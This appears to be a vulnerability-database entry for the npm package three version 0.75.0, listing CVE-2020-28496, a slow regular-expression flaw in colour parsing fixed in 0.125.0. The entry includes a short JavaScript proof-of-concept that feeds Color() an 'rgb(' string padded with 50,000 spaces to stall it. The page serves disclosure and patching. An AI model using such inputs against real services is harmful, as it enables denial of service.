Search for packages
| purl | pkg:npm/three@0.75.0 |
| Vulnerability | Summary | Fixed by |
|---|---|---|
|
VCID-8tyc-3c24-sbac
Aliases: CVE-2020-28496 GHSA-fq6p-x6j3-cmmq |
This affects the package three before 0.125.0. This can happen when handling rgb or hsl colors. PoC: var three = require('three') function build_blank (n) { var ret = "rgb(" for (var i = 0; i < n; i++) { ret += " " } return ret + ""; } var Color = three.Color var time = Date.now(); new Color(build_blank(50000)) var time_cost = Date.now() - time; console.log(time_cost+" ms") |
Affected by 0 other vulnerabilities. |
| Vulnerability | Summary | Aliases |
|---|---|---|
| This package is not known to fix vulnerabilities. | ||
| Date | Actor | Action | Vulnerability | Source | VulnerableCode Version |
|---|---|---|---|---|---|
| 2026-06-12T17:33:38.052880+00:00 | GitLab Importer | Affected by | VCID-8tyc-3c24-sbac | https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/three/CVE-2020-28496.yml | 38.6.0 |